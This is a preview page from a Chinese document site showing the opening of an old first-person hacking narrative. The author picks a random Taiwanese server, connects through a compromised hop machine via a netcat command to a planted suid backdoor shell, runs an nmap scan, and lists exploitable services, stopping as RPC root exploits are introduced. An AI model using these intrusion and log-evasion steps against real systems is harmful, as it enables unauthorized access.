- 1、本文档共21页,可阅读全部内容。
- 2、原创力文档(book118)网站文档一经付费(服务费),不意味着购买了该文档的版权,仅供个人/单位学习、研究之用,不得用于商业用途,未经授权,严禁复制、发行、汇编、翻译或者网络传播等,侵权必究。
- 3、本站所有内容均由合作方或网友上传,本站不对文档的完整性、权威性及其观点立场正确性做任何保证或承诺!文档内容仅供研究参考,付费前请自行鉴别。如您付费,意味着您自己接受本站规则且自行承担风险,本站不退款、不进行额外附加服务;查看《如何避免下载的几个坑》。如果您已付费下载过本站文档,您可以点击 这里二次下载。
- 4、如文档侵犯商业秘密、侵犯著作权、侵犯人身权等,请点击“版权申诉”(推荐),也可以打举报电话:400-050-0827(电话支持时间:9:00-18:30)。
查看更多
一次入侵过程
一次入侵过程
一次入侵过程 一次入侵过程
入侵过程
--------
by quack
本文的写作目的仅仅是为了给某些粗心大意的网络管理人员一个警告——internet是
有趣但十分脆弱的,当你的计算机放在互联网上给人们提供信息与服务的同时,会引
来网络中的“好奇者”的窥探。而安全性与便利性是一对矛盾……在你对自己的网络
做了一个安全策略考量之后,你应该确定你愿意以多大的风险来使用一些方便的服务,
当然这些服务——比如rlogin,可能只会使你少输入一次密码……
首先是确定目标——撞大运乱挑一个吧,试试能不能成功……呵,于是登上yahoo,上
taiwan的站点小遛了一下……唔,这个还不错,我们姑且称其为……还
是先ping一下看看情势如何——别碰上有墙的就逊了……
C:\ping
Pinging [11] with 32 bytes of data:
Reply from 11: bytes=32 time=621ms TTL=241
Reply from 11: bytes=32 time=620ms TTL=241
Reply from 11: bytes=32 time=611ms TTL=241
Reply from 11: bytes=32 time=591ms TTL=241
速度还是很快的嘛……那就开始吧……
先登上某台跳板台湾的机器——这样安全一些,不会留下你自己的IP……(当然,说句
题外话——这样要追查到还不是很困难,曾经有个朋友同我说过,南方某大学一次被
黑,种种迹象都表明黑客来自美国,IP、更改后主页上留下的话语……朋友受托去补
漏查源,发现那IP是美国一个提供免费shell的服务供应商……于是申请了一个shell,
通过一系列动作成为root,查看系统日志——真相大白,IP居然指向那家大学自身)。
通过跳板还有一个好处——如果你的尝试失败,在系统日志里留下来的是台湾本土的
IP,这样的登陆失败命令比较不会引起系统管理员的注意……
C:\nc ***.***.***.*** 12345
就登上跳板了,12345端口里我预留了一个suid的shell……
好了,祭起宝刀——nmap……
# ./nmap -sT -O 11
Starting nmap V. 2.3BETA12 by Fyodor (fyodor@, /nmap/)
Interesting ports on (11):
Port State Protocol Service
7 open tcp echo
9 open tcp discard
19 open tcp chargen
21 open tcp ftp
23 open tcp telnet
25 open tcp smtp
37 open tcp time
79 open tcp finger
80 open tcp http
111 open tcp sunrpc
443 open tcp https
512 open tcp exec
513 open tcp login
514 open tcp shell
515 open tcp printer
540 open tcp uucp
3306 open tcp mysql
TCP Sequence Prediction: Class=random positive increments
Difficulty=55346 (Worthy challenge)
No OS matches for host (If you know what OS is running on it
…………
…………
Nmap run completed -- 1 IP address (1 host up) scanned in 17 seconds
唔,运气还不错,提供的服务不少,估计漏也少不到哪儿去……只是没判断出系统
类型,这些服务里看上去可以利用的有:
Port State Protocol Service
21 open tcp ftp
25 open tcp smtp
79 open tcp finger
80 open tcp http
111 open tcp sunrpc
512 open tcp exec
513 open tcp login
514 open tcp shell
540 open tcp uucp
3306 open tcp mysql
最近rpc攻击非常流行,原因之一恐怕是方便易行——只要存在漏洞,远程就可以
得到一个rootshell……甚至对计算机完全
您可能关注的文档
- matpiv大作业.doc
- MEL语法.doc
- moddefaults.doc
- Myses 语法大全.doc
- MTK_SETUP.doc
- neie3答案.doc
- NEIE全新版视听说2(网络版)超详细答案第三部分.doc
- NEIE全新版视听说2(网络版)超详细答案第二部分.doc
- NMB替代AXIAL.doc
- ONU注册.doc
- 行政法学与数字时代的挑战试题及答案.docx
- 行政法制度创新的法律框架试题与答案.docx
- 行政法在新时代改革中的适应性试题及答案.docx
- 行政法学与检察制度的结合试题与答案.docx
- 2025至2030年中国交流电源噪声滤波器市场分析及竞争策略研究报告.docx
- 2025至2030年中国仿陶瓷餐具行业投资前景及策略咨询研究报告.docx
- 2025至2030年中国发动机综合性能分析仪行业投资前景及策略咨询研究报告.docx
- 2025至2030年中国PVC童装拖鞋行业发展研究报告.docx
- 2025至2030年中国不锈钢电热厨具行业投资前景及策略咨询报告.docx
- 2025至2030年中国尼龙球行业投资前景及策略咨询研究报告.docx
文档评论(0)